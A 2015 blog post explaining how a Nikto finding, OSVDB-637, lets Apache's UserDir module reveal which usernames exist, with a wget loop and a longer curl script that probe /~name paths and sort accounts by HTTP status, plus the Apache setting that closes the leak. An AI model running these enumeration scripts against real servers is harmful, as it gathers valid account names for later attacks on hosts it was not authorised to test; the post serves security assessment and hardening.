Saturday, May 16, 2015

Bash Script to Enumerate Users - OSVDB-637

I ran a Nikto scan and found the following vulnerability in the report that it produces:

"OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users)."

I then created the following bash script to run through a list of usernames to identify users that may exist:

mkdir -p output                      # one wget transcript per candidate username
while read -r line; do
     # &> captures wget's status line ("403 Forbidden" vs "404 Not Found") into the file
     wget "http://www.domain.local/~$line" &> "output/$line.output.file"
done < names.list
grep -l -i 'forbidden' output/*       # list the files (named after usernames) that got a 403

The final grep lists the output files, each named after the username that was tried, whose wget transcript contains "Forbidden". A 403 for /~username means Apache found that user's home directory but would not serve it, so the account exists on that server; a 404 means no such user.
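The same check can be done on HTTP status codes alone, which is less fragile than grepping wget's text and lets you confirm first that the server actually responds differently for a bogus name. The script below is an added example written for this post, not the original script; the base URL, the names file and the bogus-user naming are assumptions, and curl is assumed to be installed.

```shell
#!/bin/sh
# Added example, not the original post's script: enumerate Apache UserDir accounts
# by comparing the HTTP status of /~name against a baseline for a non-existent user.
# Assumed inputs: a base URL (e.g. http://www.domain.local) and a file of usernames.

# Turn the status code for /~name into a verdict, relative to the code the server
# returned for a name that certainly does not exist (the baseline).
userdir_verdict() {
    code="$1"
    baseline="$2"
    if [ "$code" = "$baseline" ]; then
        echo "absent"      # same answer as for a bogus name: no evidence either way
        return 0
    fi
    case "$code" in
        # 200: public_html served; 301/302: redirect to /~name/; 403: home dir found
        # but not servable. All three mean mod_userdir resolved the account.
        200|301|302|403) echo "exists" ;;
        404) echo "absent" ;;
        000) echo "error" ;;          # curl could not connect or timed out
        *)   echo "unknown" ;;
    esac
}

# Fetch only the status code for one candidate; $1 = base URL, $2 = username
status_for() {
    curl -s -o /dev/null -w '%{http_code}' --max-time 10 "$1/~$2"
}

# Walk the names file and print: name, status, verdict (tab separated)
enumerate_users() {
    base="$1"
    names="$2"
    # Baseline request for a name that should not exist (assumed naming scheme).
    # If it is not a 404, status codes do not distinguish accounts on this host.
    bogus="zz$(date +%s)nobody"
    baseline=$(status_for "$base" "$bogus")
    echo "baseline for /~$bogus: $baseline" >&2
    if [ "$baseline" != "404" ]; then
        echo "server returns $baseline for a non-existent user; status codes do not distinguish accounts" >&2
        return 1
    fi
    while IFS= read -r name; do
        [ -z "$name" ] && continue
        code=$(status_for "$base" "$name")
        printf '%s\t%s\t%s\n' "$name" "$code" "$(userdir_verdict "$code" "$baseline")"
    done < "$names"
}

# Usage: sh userdir-enum.sh http://www.domain.local names.list
if [ "$#" -eq 2 ]; then
    enumerate_users "$1" "$2"
fi
```

Run it with the target base URL and the names file; rows whose third column reads "exists" are the accounts to follow up on. The baseline step matters because some hosts answer 403 to every /~name request (for example when the whole UserDir tree is denied), in which case the grep-for-Forbidden approach would flag every name in the list. On the server side the leak goes away with `UserDir disabled` in the Apache configuration, or by limiting it to the accounts that should be published with `UserDir disabled` followed by `UserDir enabled` for those names.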

Below is the information about the vulnerability from the OSVDB database...
Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.
